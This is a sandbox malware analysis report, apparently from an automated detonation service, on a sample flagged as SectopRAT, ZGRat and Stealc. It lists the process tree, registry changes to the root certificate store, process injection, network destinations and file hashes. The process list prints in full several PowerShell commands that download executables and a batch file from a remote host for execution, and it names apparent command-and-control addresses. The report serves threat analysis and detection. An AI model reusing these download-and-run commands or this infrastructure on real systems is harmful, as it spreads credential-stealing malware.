Analysis Overview
SHA256
1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784
Threat Level: Known bad
The file file was found to be: Known bad.
Malicious Activity Summary
SectopRAT payload
SectopRAT
ZGRat
Detect ZGRat V1
Stealc
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-26 09:05
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win7-20231129-en
Max time kernel
145s
Max time network
149s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealc
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2036 set thread context of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 636 set thread context of 2380 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=28381000 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
"C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe"
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 240216234727901.mjj.xne26.cfd | udp |
| BG | 94.156.35.76:80 | 240216234727901.mjj.xne26.cfd | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | c.574859385.xyz | udp |
| GB | 37.221.125.202:443 | c.574859385.xyz | tcp |
| GB | 37.221.125.202:443 | c.574859385.xyz | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| RU | 91.215.85.66:15647 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| FR | 185.93.2.244:80 | download.iolo.net | tcp |
| RU | 91.215.85.66:15647 | tcp | |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\nst199A.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
